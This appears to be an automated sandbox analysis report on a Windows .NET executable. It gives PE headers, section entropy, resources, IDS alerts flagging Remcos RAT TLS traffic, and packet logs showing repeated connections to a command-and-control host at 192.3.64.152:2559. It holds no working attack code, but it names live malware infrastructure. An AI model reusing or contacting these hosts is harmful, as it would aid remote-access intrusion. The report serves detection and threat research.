                                                                                        TLSH:9225F1E03B327729DEA94A34D259DDB692E20AA8B0447AF725DC3B5734CC112EE0CF55
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.)g..............0.............^.... ........@.. .......................@............@................................

                                                                                        File Icon

                                                                                        Icon Hash:a1844e6f2f4f6f3b

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x4ff25e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6729837E [Tue Nov 5 02:31:26 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xff20c0x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x10a0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1020000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000xfd2640xfd4005b90f19cbf5256cc9bcae3b3fe68880cFalse0.9064804031959526data7.838238330749531IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x1000000x10a00x12005b102d8b2196a2aec1d1bbc638e58828False0.365234375data5.9887205070970175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x1020000xc0x200f70dd702c1e90ecae766b0fde8299ea3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0x1001000xa34PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.36294027565084225
                                                                                        RT_GROUP_ICON0x100b440x14data1.05
                                                                                        RT_VERSION0x100b680x338data0.4308252427184466
                                                                                        RT_MANIFEST0x100eb00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-05T11:00:06.638409+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449732192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:08.654038+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449734178.237.33.5080TCP
                                                                                        2024-11-05T11:00:22.102362+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449737TCP
                                                                                        2024-11-05T11:00:38.780201+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449743192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:40.297031+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449744192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:41.840557+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449745192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:43.365692+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449746192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:44.926946+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449747192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:46.455416+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449748192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:47.983994+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449749192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:49.511785+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449750192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:51.032906+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449751192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:52.555688+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449752192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:54.092502+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449753192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:55.806477+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449754192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:57.390141+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449755192.3.64.1522559TCP
                                                                                        2024-11-05T11:00:58.923499+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449756192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:00.462297+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449759192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:00.945958+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449758TCP
                                                                                        2024-11-05T11:01:02.006446+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449760192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:03.547036+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449770192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:05.076623+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449781192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:06.620764+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449791192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:08.156592+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449798192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:09.687902+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449809192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:11.323923+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449819192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:12.849107+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449830192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:14.367356+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449836192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:15.876289+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449847192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:17.399262+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449858192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:18.972734+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449866192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:20.734121+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449875192.3.64.1522559TCP
                                                                                        2024-11-05T11:01:23.273775+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449891178.237.33.5080TCP
                                                                                        2024-11-05T11:02:52.281240+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450038192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:53.797351+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450039192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:55.336861+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450040192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:56.865531+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450041192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:58.360089+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450042192.3.64.1522559TCP
                                                                                        2024-11-05T11:02:59.828922+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450043192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:01.395703+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450044192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:02.790801+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450045192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:04.635247+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450046192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:05.985002+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450047192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:07.289006+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450048192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:08.580628+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450049192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:09.839104+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450050192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:11.075772+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450051192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:12.286988+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450052192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:13.478471+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450053192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:14.646913+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450054192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:15.977568+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450055192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:17.104528+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450056192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:18.217231+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450057192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:19.325075+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450058192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:20.390850+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450059192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:21.436759+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450060192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:22.592461+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450061192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:23.605016+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450062192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:24.619841+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450063192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:25.603330+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450064192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:26.603845+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450065192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:27.554029+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450066192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:28.486990+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450067192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:29.410772+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450068192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:30.312138+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450069192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:31.214878+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450070192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:32.099975+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450071192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:32.991461+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450072192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:33.850975+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450073192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:34.703120+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450074192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:35.553486+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450075192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:36.395178+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450076192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:37.212820+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450077192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:38.014881+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450078192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:38.843323+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450079192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:39.652111+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450080192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:40.427011+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450081192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:41.222344+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450082192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:42.001603+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450083192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:42.766178+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450084192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:43.523439+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450085192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:44.249005+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450086192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:45.206171+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450087192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:45.927335+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450088192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:46.645435+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450089192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:47.368579+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450090192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:48.071323+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450091192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:48.869592+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450092192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:49.567892+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450093192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:50.258212+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450094192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:50.940124+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450095192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:51.626724+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450096192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:52.310155+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450097192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:52.983758+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450098192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:53.648182+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450099192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:54.487482+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450100192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:55.245924+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450101192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:55.918843+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450102192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:56.568841+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450103192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:57.211039+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450104192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:57.850932+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450105192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:58.478909+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450106192.3.64.1522559TCP
                                                                                        2024-11-05T11:03:59.407104+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450107192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:00.042584+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450108192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:00.672272+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450109192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:02.321155+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450110192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:02.946702+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450111192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:03.691084+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450112192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:04.304407+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450113192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:04.919721+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450114192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:05.523669+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450115192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:06.131163+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450116192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:06.743191+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450117192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:07.372535+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450118192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:07.979396+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450119192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:08.562560+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450120192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:09.150227+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450121192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:09.760468+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450122192.3.64.1522559TCP
                                                                                        2024-11-05T11:04:11.296757+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450123192.3.64.1522559TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 5, 2024 11:00:05.932912111 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:05.937822104 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:05.937889099 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:05.943623066 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:05.948487997 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:06.606270075 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:06.638290882 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:06.638408899 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:06.642663956 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:06.647497892 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:06.647567987 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:06.652445078 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:06.652517080 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:06.657331944 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:06.852354050 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:06.854732990 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:06.859570026 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:07.161055088 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:07.211669922 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:07.239789963 CET4973480192.168.2.4178.237.33.50
                                                                                        Nov 5, 2024 11:00:07.244775057 CET8049734178.237.33.50192.168.2.4
                                                                                        Nov 5, 2024 11:00:07.244878054 CET4973480192.168.2.4178.237.33.50
                                                                                        Nov 5, 2024 11:00:07.245033979 CET4973480192.168.2.4178.237.33.50
                                                                                        Nov 5, 2024 11:00:07.249819994 CET8049734178.237.33.50192.168.2.4
                                                                                        Nov 5, 2024 11:00:08.653970003 CET8049734178.237.33.50192.168.2.4
                                                                                        Nov 5, 2024 11:00:08.654010057 CET8049734178.237.33.50192.168.2.4
                                                                                        Nov 5, 2024 11:00:08.654037952 CET4973480192.168.2.4178.237.33.50
                                                                                        Nov 5, 2024 11:00:08.654088020 CET4973480192.168.2.4178.237.33.50
                                                                                        Nov 5, 2024 11:00:08.654171944 CET8049734178.237.33.50192.168.2.4
                                                                                        Nov 5, 2024 11:00:08.654234886 CET4973480192.168.2.4178.237.33.50
                                                                                        Nov 5, 2024 11:00:08.665004969 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:08.671338081 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:09.221169949 CET8049734178.237.33.50192.168.2.4
                                                                                        Nov 5, 2024 11:00:09.221251011 CET4973480192.168.2.4178.237.33.50
                                                                                        Nov 5, 2024 11:00:27.347295046 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:27.348889112 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:27.353723049 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:37.272979021 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:37.273117065 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:37.273178101 CET497322559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:37.281630993 CET255949732192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:38.275091887 CET497432559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:00:38.279953003 CET255949743192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:00:38.280021906 CET497432559192.168.2.4192.3.64.152
